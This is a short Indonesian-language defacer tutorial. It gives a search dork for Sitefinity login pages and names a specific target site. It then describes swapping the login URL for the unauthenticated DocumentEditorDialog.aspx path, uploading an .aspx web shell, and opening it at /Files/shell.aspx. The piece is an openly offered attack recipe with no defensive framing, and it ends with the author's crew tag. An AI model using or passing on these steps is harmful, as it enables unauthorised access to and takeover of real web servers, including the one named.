Dork : "Sitefinity: Login"
Target : http://www.cyberwolf-software.com/sitefinity/login.aspx
Exploit :
/sitefinity/login.aspx
ganti dengan
/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
lalu klik ( Select ) untuk upload shell, ingat upload shell yang .aspx tadi soalnya ini web berbasis ASP.Net
lalu klik "Upload selected"
Lihat gambar dibawah :
lalu klik "Insert"
jika sudah check di
lalu menuju Penyimpanan shell :
target.com/Files/shell.aspx
Tara.... shell yang berformat .aspx sudah tertanam
NITIP NICK: #IndStart45